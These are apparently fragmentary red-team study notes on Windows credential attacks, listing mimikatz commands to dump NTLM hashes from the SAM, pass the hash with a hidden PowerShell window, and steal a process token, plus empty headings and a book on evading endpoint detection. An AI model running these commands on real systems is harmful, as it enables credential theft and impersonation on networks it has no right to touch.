Useful for trackig filesystem, Process, Threads, DLL activity
- PassTheHash - Dump NTLM hashes
lsadump::sam, now Impersonate a usermimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:"powershell -w hidden", now migrate to the new created process as the impersonated usersteal_token 1234 - PassTheTicket - ?????????????????????
- OverPassTheHash -
- Grey hat GoLang
- Evading EDR Book - https://learning.oreilly.com/library/view/evading-edr/9781098168742/